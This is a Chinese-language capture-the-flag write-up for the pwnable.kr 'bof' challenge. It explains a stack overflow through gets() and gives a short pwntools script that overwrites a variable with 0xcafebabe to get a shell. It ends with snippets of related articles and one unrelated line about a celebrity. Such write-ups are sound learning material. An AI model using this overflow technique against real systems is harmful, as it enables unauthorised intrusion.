-检查main函数调用了什么
main.png
-func函数实现了什么功能
func.png
func汇编.png
-如何使key==0xcafebabe,调用system(“/bin/sh”)
-看到调用了gets,使用命令man查看gets函数定义,可知gets是读取一整行的字符直到结束换行
man gets.png
-看到字符s(即数组overflows)的大小为-2CH,因此我们的目的是将44(2C)填满,并且让我们的key也被覆盖,改变为0xcafebabe。
-由汇编的比较我们知道是arg_0与cafebabe比较
cmp.png
-因此总的覆盖范围应该从-2CH到+08H,一共52个字节
from pwn import*
pwn= remote("pwnable.kr",9000)
junk="a"*0x2c + "a"*0x4 + "b"*0x4
junk+=p32(0xcafebabe)
pwn.sendline(junk)
pwn.interactive()
下载链接:http://pwnable.kr/bin/bofhttp://pwnable.kr/bin/bof.c...
pwnable.kr 下载 先将bof 与 bof.c下载下来,先检查下 bof开启的保护 是真的吓到,基本能开的...
1 简单的溢出 题目来源:http://pwnable.kr 之 bof 直接放入IDA,发现func函数存在问题...
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之...
思路 -检查main函数调用了什么 -func函数实现了什么功能 -如何使key==0xcafebabe,调用sy...
明显可以看出gets(overflowme)中存在栈溢出,用gdb调试一下 gdb .bof 在main函数处设个...
pwnable.kr
鹿晗是首位入选“BOF 500”榜单成员的华语男明星,也是唯一一名登上BoF纸质刊封面的华人,被BOF评为“国际...
题目来自pwnable.kr 题目给了源码和可执行文件 查看源码可以知道 这是一个栈溢出 只要key=0xcafe...
今天咱们来继续玩 pwnable.kr pwnable.kr collision 同样的,我们远程连接上服务器,然...
本文标题:pwnable.kr bof
本文链接:https://www.haomeiwen.com/subject/bbcifqtx.html
网友评论